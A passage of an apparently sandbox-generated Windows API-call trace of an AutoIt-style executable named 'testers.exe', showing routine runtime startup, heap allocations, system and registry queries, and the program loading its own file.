\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0245.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+Ā", cchSrc=256, lpDestStr=0x8df008, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0245.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x8df6c0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ+¸\r%üù\x8d", lpUsedDefaultChar=0x0) returned 256 [0245.207] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0245.207] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2c4d1c) returned 0x0 [0245.207] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.207] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.207] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x3c) returned 0xbf2240 [0245.208] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.208] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3300 [0245.208] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xbf2a80 [0245.208] GetVersionExW (in: lpVersionInformation=0x8df8d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1f1e1d1c, dwMinorVersion=0x23222120, dwBuildNumber=0x27262524, dwPlatformId=0xb1000f, szCSDVersion="\x04") | out: lpVersionInformation=0x8df8d8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0245.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3300 | out: hHeap=0xbe0000) returned 1 [0245.208] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xbffbc0 [0245.208] GetCurrentProcess () returned 0xffffffff [0245.208] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x8dfa28 | out: Wow64Process=0x8dfa28) returned 1 [0245.208] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.208] GetProcAddress (hModule=0x75990000, lpProcName="GetNativeSystemInfo") returned 0x759b10b5 [0245.208] GetNativeSystemInfo (in: lpSystemInfo=0x8df9f4 | out: lpSystemInfo=0x8df9f4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0245.209] FreeLibrary (hLibModule=0x75990000) returned 1 [0245.209] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xbf3300 [0245.209] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3318 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc04038 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3330 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc04048 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3348 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc04058 [0245.210] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3360 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc04068 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3378 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc04078 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3390 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05088 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf33a8 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050b0 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf33c0 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050c0 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf33d8 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050d0 [0245.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf33f0 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050e0 [0245.211] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0245.211] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0245.211] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0245.211] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0245.211] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0245.211] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3408 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050f0 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc054b0 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05100 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc054c8 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05110 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc054e0 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05120 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc054f8 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05130 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05510 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05140 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05528 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05150 [0245.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05540 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05160 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05558 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05170 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05570 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05180 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05190 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05588 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051a0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc055a0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051b0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc055b8 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051c0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc055d0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051d0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc055e8 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051e0 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc051f0 [0245.212] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05600 [0245.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05200 [0245.213] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xbf2288 [0245.213] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0245.213] OleInitialize (pvReserved=0x0) returned 0x0 [0245.224] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05618 [0245.224] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05220 [0245.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x8df9fc | out: phkResult=0x8df9fc*=0xf8) returned 0x0 [0245.224] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x8dfa18, lpcbData=0x8dfa00*=0x8 | out: lpType=0x0, lpData=0x8dfa18*=0x30, lpcbData=0x8dfa00*=0x4) returned 0x0 [0245.224] RegCloseKey (hKey=0xf8) returned 0x0 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06390 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05230 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05240 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05250 [0245.225] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05648 [0245.225] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05260 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc063b8 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05270 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05660 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05280 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05678 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05290 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05690 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052a0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc056a8 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052b0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc056c0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052c0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc056d8 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052d0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc056f0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052e0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05708 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc052f0 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05720 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05300 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05738 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05310 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05750 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05320 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05768 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05330 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05780 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05340 [0245.226] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05798 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05350 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc057b0 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05360 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc057c8 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05370 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc057e0 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05380 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc057f8 [0245.227] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05390 [0245.227] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.227] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.229] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05810 [0245.229] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053a0 [0245.231] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8bf9d0, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0245.231] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc0a578 [0245.231] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053b0 [0245.233] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8af9c0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0245.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05810 | out: hHeap=0xbe0000) returned 1 [0245.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc0a5d0 [0245.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a578 | out: hHeap=0xbe0000) returned 1 [0245.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053b0 | out: hHeap=0xbe0000) returned 1 [0245.233] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8bf9dc, lpFilePart=0x8cf9dc | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x8cf9dc*="testers.exe") returned 0x20 [0245.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc063e0 [0245.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05810 [0245.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05828 [0245.233] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053b0 [0245.233] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x8cf9f8 | out: phkResult=0x8cf9f8*=0x0) returned 0x2 [0245.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05828 | out: hHeap=0xbe0000) returned 1 [0245.233] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053b0 | out: hHeap=0xbe0000) returned 1 [0245.233] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.234] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.234] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05828 [0245.234] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053b0 [0245.235] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.235] IsThemeActive () returned 0x1 [0245.235] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x8dfa1c, fWinIni=0x0 | out: pvParam=0x8dfa1c) returned 1 [0245.235] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0245.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05840 [0245.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053c0 [0245.235] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x8cf9f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0245.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05858 [0245.235] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053d0 [0245.235] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8af950, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0245.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc0a578 [0245.236] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.237] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x89f940, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0245.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3348 | out: hHeap=0xbe0000) returned 1 [0245.237] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc0a628 [0245.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a578 | out: hHeap=0xbe0000) returned 1 [0245.237] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053e0 | out: hHeap=0xbe0000) returned 1 [0245.237] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xbf22d0 [0245.237] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.238] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.238] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0245.238] Wow64DisableWow64FsRedirection (in: OldValue=0x8bf954 | out: OldValue=0x8bf954*=0x0) returned 1 [0245.238] FreeLibrary (hLibModule=0x75990000) returned 1 [0245.238] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xc0a578 [0245.238] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8bf7f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0245.239] GetFileType (hFile=0xf8) returned 0x1 [0245.239] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0245.239] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.240] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0245.240] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0245.240] FreeLibrary (hLibModule=0x75990000) returned 1 